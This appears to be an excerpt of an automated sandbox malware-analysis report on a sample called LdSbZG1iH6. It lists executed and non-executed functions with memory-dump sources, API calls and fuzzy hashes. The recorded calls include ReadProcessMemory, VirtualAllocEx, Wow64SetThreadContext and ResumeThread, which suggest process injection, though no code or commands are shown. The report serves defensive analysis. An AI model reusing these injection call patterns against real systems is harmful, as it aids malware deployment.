                                                                                                                                                Function 059B7288 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059B7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 76d49efd99a503a29bad7aed5fd5e8c94519d574d7614d5df18793fd454c5420
                                                                                                                                                • Instruction ID: 19f5b24b62ea6deee6b2e73ee8c1ade2cd725b6d1755adacdb44f1fc2b8a2ba0
                                                                                                                                                • Opcode Fuzzy Hash: 76d49efd99a503a29bad7aed5fd5e8c94519d574d7614d5df18793fd454c5420
                                                                                                                                                • Instruction Fuzzy Hash: 9A2134B1C002599FDB10CFA9C981BEEBBF4FF48320F50842AE959A7250C7789944CBA1
                                                                                                                                                Function 07A37BC0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 07A37C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 824e206e34768f4031e5ac984a14c5fbce41f919fc04f77d2be04685fbe91803
                                                                                                                                                • Instruction ID: 0b5df911970a5f63be62d84e9cbd0248dcf7b2dab8697a03b1cf7a72e6a126df
                                                                                                                                                • Opcode Fuzzy Hash: 824e206e34768f4031e5ac984a14c5fbce41f919fc04f77d2be04685fbe91803
                                                                                                                                                • Instruction Fuzzy Hash: 90218CB4A003589FCB10DF99D445BAEFBF5EB48324F108419E855AB340C779A984CFA1
                                                                                                                                                Function 059B7001 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059B7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 0b60bab8251b0eae25a6fc9beae3055675b1fb7b34d42282e99973265ffe1605
                                                                                                                                                • Instruction ID: bf46fef5fb8cf0191db197975f75d2df02df2ef09b0e3f3b1b023376c35c4fcf
                                                                                                                                                • Opcode Fuzzy Hash: 0b60bab8251b0eae25a6fc9beae3055675b1fb7b34d42282e99973265ffe1605
                                                                                                                                                • Instruction Fuzzy Hash: 992168B1D003098FDB10CFA9C5857EEBBF4EF88324F14842AD459A7280D7789984CFA0
                                                                                                                                                Function 00F8D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: 74719c44dd516b5533a0758aa1d868f9e16f4b8b6298b81a61de8a0b89914c40
                                                                                                                                                • Instruction ID: 60520a413469d0e51e4d899f760774b035bddc32132de7323e9b51402c0493c3
                                                                                                                                                • Opcode Fuzzy Hash: 74719c44dd516b5533a0758aa1d868f9e16f4b8b6298b81a61de8a0b89914c40
                                                                                                                                                • Instruction Fuzzy Hash: 452103B5900249EFDB10CFAAD584ADEBFF4EB48324F14842AE954A3250D374A944CFA1
                                                                                                                                                Function 059B7008 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059B7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 4cbc1ce2d482f1d8bd84c733b9416f1a3293f7e08756017df2ffc610acd26cf6
                                                                                                                                                • Instruction ID: 888139277831368eb9e252ae23c24c21e6f53318c9b13e15236ffba244657d7e
                                                                                                                                                • Opcode Fuzzy Hash: 4cbc1ce2d482f1d8bd84c733b9416f1a3293f7e08756017df2ffc610acd26cf6
                                                                                                                                                • Instruction Fuzzy Hash: 042118B1D043098FDB10DFAAC5857EEBBF4EF88324F14842AD459A7241C778A985CFA5
                                                                                                                                                Function 059B7290 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059B7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: bce748675ad9b9647a7110d257ab56f87c95c740f375e33150d639b39a62a5f4
                                                                                                                                                • Instruction ID: 5105b45466f1add412e0983c70a6706e0d558f2c04bcf317aa3784cb0cb6de27
                                                                                                                                                • Opcode Fuzzy Hash: bce748675ad9b9647a7110d257ab56f87c95c740f375e33150d639b39a62a5f4
                                                                                                                                                • Instruction Fuzzy Hash: BB2139B1D003599FDB10DFAAC980AEEFBF5FF48310F50842AE959A7250C7749544CBA5
                                                                                                                                                Function 00F8D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: be3fbe853261759847ba60448821ab39a5bdbdd49088c97fc0cfb4cd4dfa99c1
                                                                                                                                                • Instruction ID: 191a7dddc6603fcbf2bb420eaf8123f57c7233307e7b0903d1a68917932e1b81
                                                                                                                                                • Opcode Fuzzy Hash: be3fbe853261759847ba60448821ab39a5bdbdd49088c97fc0cfb4cd4dfa99c1
                                                                                                                                                • Instruction Fuzzy Hash: 9921E4B59002089FDB10CF9AD584ADEBBF4FB48320F14841AE914A3350D374A944CFA5
                                                                                                                                                Function 07A37BB3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 07A37C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 7d124517b166aab01fce79b26a62acdb0cd0c0b4a0b0f82679a000e31fc04ab6
                                                                                                                                                • Instruction ID: f133a907d2fb94657a4ef5dca37a4419b0761c70e64d72b4717c6dea7f4dcfb1
                                                                                                                                                • Opcode Fuzzy Hash: 7d124517b166aab01fce79b26a62acdb0cd0c0b4a0b0f82679a000e31fc04ab6
                                                                                                                                                • Instruction Fuzzy Hash: 1C219DB09043589FCB11DF95D445BEEBFF4EB49320F00804AE855A7241C3386A84CFA1
                                                                                                                                                Function 059B70D9 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059B714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 3383863c69bc28d85ae0df9bd62eb3f073d1e0d6b60e8851cd5d3df561b0303d
                                                                                                                                                • Instruction ID: 0301371865c5b5428d1d3522ba29bc036f0418fb9efd44dc7d171089160e3ad7
                                                                                                                                                • Opcode Fuzzy Hash: 3383863c69bc28d85ae0df9bd62eb3f073d1e0d6b60e8851cd5d3df561b0303d
                                                                                                                                                • Instruction Fuzzy Hash: A41126B2900249DFDB10DFA9C944BDFBBF5EF88324F20841AE559A7250C775A584CFA1
                                                                                                                                                Function 059B70E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059B714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: a924b3c05b7925ba02613de6b6eea8004c829af5d52713f6714a4e6313c483d7
                                                                                                                                                • Instruction ID: 65cad87ecc8b94f7e4429780cce3b39870bc18643b83d61348605260ab7dfbd6
                                                                                                                                                • Opcode Fuzzy Hash: a924b3c05b7925ba02613de6b6eea8004c829af5d52713f6714a4e6313c483d7
                                                                                                                                                • Instruction Fuzzy Hash: B91167B18002488FDB10DFAAC944BDFBFF5EF88324F108419E519A7250C775A544CFA0
                                                                                                                                                Function 059B6F58 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: 563f8e4480b397c6d826dc0153475c82acd1d77cc988f6d4631c4c0992982f7c
                                                                                                                                                • Instruction ID: 3976c49769478f2ed498ce8f1fcfc8188728fed839cb338061c031ed3e00d192
                                                                                                                                                • Opcode Fuzzy Hash: 563f8e4480b397c6d826dc0153475c82acd1d77cc988f6d4631c4c0992982f7c
                                                                                                                                                • Instruction Fuzzy Hash: A91136B19003488FDB20DFAAC5457EFFBF4EB88324F24842AD459A7250CB75A944CFA5
                                                                                                                                                Function 059B6F51 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: d732d0c7142bdaf63eddc14b6c80090568f3f5fa841cd390bbbdd5637dbd1fd0
                                                                                                                                                • Instruction ID: 6d3c9db825a56afbc9785fa159955eb63baa34460450f7c60d7fdc72dff1f8ea
                                                                                                                                                • Opcode Fuzzy Hash: d732d0c7142bdaf63eddc14b6c80090568f3f5fa841cd390bbbdd5637dbd1fd0
                                                                                                                                                • Instruction Fuzzy Hash: 731136B1900249CFDB10DFA9C5447EEFBF5AB88324F24882AC469A7354CB79A944CF95
                                                                                                                                                Function 00F8B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F8B07E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                • Opcode ID: 1eccf8c06cb2e7218d63952f915dbe9d1721d6b443343f376eee20ce8c5213b2
                                                                                                                                                • Instruction ID: b0a270596952308dee30c6607b435efe3b7302c65625843fdd93f7090c0c74b9
                                                                                                                                                • Opcode Fuzzy Hash: 1eccf8c06cb2e7218d63952f915dbe9d1721d6b443343f376eee20ce8c5213b2
                                                                                                                                                • Instruction Fuzzy Hash: 2E11DFB5D003498FCB20DF9AC444ADFFBF4EB88324F10842AD869A7210D379A545CFA5
                                                                                                                                                Function 059BBC69 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 059BBC95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                • Opcode ID: 5d9078030eccced1954dc4d93b81144ba1d95dcb6a31433dc912220531a8197d
                                                                                                                                                • Instruction ID: 38a8ee77d3e6f73bb4d93efefb94ddd98bc5f1eb6066ab325c7535164c1eda02
                                                                                                                                                • Opcode Fuzzy Hash: 5d9078030eccced1954dc4d93b81144ba1d95dcb6a31433dc912220531a8197d
                                                                                                                                                • Instruction Fuzzy Hash: DAF0E7B5800309DFEB10CF89D448BDEBBF4FB48314F10841AE559A7250C375A584CFA1
                                                                                                                                                Function 00F3D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986314800.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f3d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ef53c812816cb2145ffc78a3003dba315a556ee515d1682e11211ad4e00a7661
                                                                                                                                                • Instruction ID: 19aabfbd39324e077728a1739482deeb19e995ba52b7e1bb92d9f119cc1591d0
                                                                                                                                                • Opcode Fuzzy Hash: ef53c812816cb2145ffc78a3003dba315a556ee515d1682e11211ad4e00a7661
                                                                                                                                                • Instruction Fuzzy Hash: 6F212671904204EFDB05DF14E9C0B27BBA5FB84334F20C66DE8494B396C736D846DA61
                                                                                                                                                Function 00F3D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986314800.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f3d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 651eb50c6c71ab8e7efe9e2b07ad15a29b9c3889e99ebce97fe8aef138a1b0ed
                                                                                                                                                • Instruction ID: 4b8e47fa1f3cab78e1349494b7119c2c97f4fd9a92f89d709df95d5de2a12137
                                                                                                                                                • Opcode Fuzzy Hash: 651eb50c6c71ab8e7efe9e2b07ad15a29b9c3889e99ebce97fe8aef138a1b0ed
                                                                                                                                                • Instruction Fuzzy Hash: BC21F5B1504200DFCB18DF14E5C4B16BB65FB84734F20C569D84A4B25AC336D847DA61
                                                                                                                                                Function 00F3D005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986314800.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f3d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d4aa16b31d7653e9c761bb92d50922c0f6bd1fbe2463d511fd6857de2ae0b683
                                                                                                                                                • Instruction ID: 437544e1a76286c47c7034fc79f19344b6cc6d7ec93ebd85d0783ff2431734ca
                                                                                                                                                • Opcode Fuzzy Hash: d4aa16b31d7653e9c761bb92d50922c0f6bd1fbe2463d511fd6857de2ae0b683
                                                                                                                                                • Instruction Fuzzy Hash: 192180755093808FCB06CF24D994715BF71EB46324F28C5EAD8498F2A7C33A980ADB62
                                                                                                                                                Function 00F3D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986314800.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f3d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction ID: 996be3665a5de8b36d41f48cdb1adbbff3b48ad0309448b7e336a27446082e41
                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                • Instruction Fuzzy Hash: 8C11BB75904280DFCB06CF10D9C4B16BBA1FB84324F24C6AAD8494B296C33AD80ADB61
                                                                                                                                                Function 00F2D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1985859767.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f2d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 93a8013f23254b4271eece1c7833902ba0fed5971d8e8380f6303cb58973be42
                                                                                                                                                • Instruction ID: a057bc648eeb4de724411ca4957b6340d0f448d2da74a5e07889c54f2608910a
                                                                                                                                                • Opcode Fuzzy Hash: 93a8013f23254b4271eece1c7833902ba0fed5971d8e8380f6303cb58973be42
                                                                                                                                                • Instruction Fuzzy Hash: 20012B314083509AE7104E25DDC4B67BF9CEF41334F18C52AED084E286C27DD840E6B1
                                                                                                                                                Function 00F2D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1985859767.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f2d000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3a963e1f99f71949c9a70f82b52bedd11c0f7bc6f070aeaf35b500290b6172f3
                                                                                                                                                • Instruction ID: f5e18cfc146c94c15523891b26d15bb2ee91f8974c62fc29d415a957ae809554
                                                                                                                                                • Opcode Fuzzy Hash: 3a963e1f99f71949c9a70f82b52bedd11c0f7bc6f070aeaf35b500290b6172f3
                                                                                                                                                • Instruction Fuzzy Hash: F7F06D71409354AAE7248E1ADDC8B62FFA8EB91734F18C45AED484E286C2799844DAB1

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 07A3A7B8 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'^q
                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                • Opcode ID: 900e94f9f44a507408a6b8429ba6695a6c9165112715080376fd0cf93eb74efb
                                                                                                                                                • Instruction ID: a28c020526ad3f23e411010ec686e5429e041d130f19d0e758326f81a7d222ef
                                                                                                                                                • Opcode Fuzzy Hash: 900e94f9f44a507408a6b8429ba6695a6c9165112715080376fd0cf93eb74efb
                                                                                                                                                • Instruction Fuzzy Hash: 8C7120B1E412089FD708DF7AE98169EBBF2FB88300F14C9A9D0089B369DB755955CB50
                                                                                                                                                Function 07A3A7C8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'^q
                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                • Opcode ID: ed999f548a838211453676f2be7f13c2fd72ee049f9082188c358d960baae675
                                                                                                                                                • Instruction ID: c73953553af688db185b736ee8d1ff682b6f97c92d2fa9c6e0d208d36bb43f4e
                                                                                                                                                • Opcode Fuzzy Hash: ed999f548a838211453676f2be7f13c2fd72ee049f9082188c358d960baae675
                                                                                                                                                • Instruction Fuzzy Hash: E3611E71E412099FD748DF7AE981A9EBBF3FB88300F14D9A9D0089B368DB755915CB40
                                                                                                                                                Function 059B7428 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bcc0f07c13413af4e16de41eb6c77198da0a90b13e2c443092182a9c4cd14fda
                                                                                                                                                • Instruction ID: 9b9cc872007fa7ad9c252152aabb96dbe1647261ad1e4fbfecb1915e8d21f322
                                                                                                                                                • Opcode Fuzzy Hash: bcc0f07c13413af4e16de41eb6c77198da0a90b13e2c443092182a9c4cd14fda
                                                                                                                                                • Instruction Fuzzy Hash: EFE10B74E042598FDB14DFA9C5809AEFBF2FF89304F248269E414AB356D770A941CFA1
                                                                                                                                                Function 059B6730 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c9734e11a5b574a6c63408202e05655ac0d18e4fb5e56f712bc855c5ce548ceb
                                                                                                                                                • Instruction ID: 5cf03d8e6bd0d3457f07296d356a3e51e68361116ec45c55d3fcbb576ab7f4c1
                                                                                                                                                • Opcode Fuzzy Hash: c9734e11a5b574a6c63408202e05655ac0d18e4fb5e56f712bc855c5ce548ceb
                                                                                                                                                • Instruction Fuzzy Hash: 28E11974E042598FEB14DFA9C5809AEFBF2FF89304F248169E414AB35AD771A941CF60
                                                                                                                                                Function 059B5EC0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ba0eb833e560a8c66587a92011608439629da1d34d2669fbaa73e216b9e416b1
                                                                                                                                                • Instruction ID: cae822a0215177e77edaf83b27698600d3c876406331dfc632995f422f7609d7
                                                                                                                                                • Opcode Fuzzy Hash: ba0eb833e560a8c66587a92011608439629da1d34d2669fbaa73e216b9e416b1
                                                                                                                                                • Instruction Fuzzy Hash: 67E10B74E042598FEB14DFA9C6809AEFBF2FF89304F248169D414AB356D771A941CF60
                                                                                                                                                Function 059B4818 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
